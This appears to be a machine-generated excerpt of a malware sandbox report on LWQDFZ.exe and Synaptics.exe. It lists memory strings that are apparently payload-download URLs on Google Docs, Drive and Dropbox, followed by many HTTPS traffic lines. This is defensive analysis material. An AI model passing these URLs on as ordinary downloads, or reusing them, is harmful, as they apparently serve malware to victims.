                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyout
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz:
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzE
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzR
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~5
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~F
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: LWQDFZ.exeString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2676891488.0000000005D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2617510709.00000000041BD000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2685043924.0000000007AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678699777.00000000069EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2885867190.00000000129BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2684300866.000000000773E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2698228679.000000000BD3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsOGlEVGxuVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2680237147.000000000716E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.comuc?id=0BxsMXGfPIZfSVlVsOGlEVGxuVk&export=download;
                              Source: Synaptics.exe, 00000003.00000003.1612400526.0000000005AA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2680316494.0000000007271000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000071A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.0000000007281000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2765546448.000000000F170000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhMg
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhMgyyp
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/~
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: LWQDFZ.exeString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: LWQDFZ.exeString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: LWQDFZ.exe, 00000000.00000003.1398437045.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                              Source: LWQDFZ.exeString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
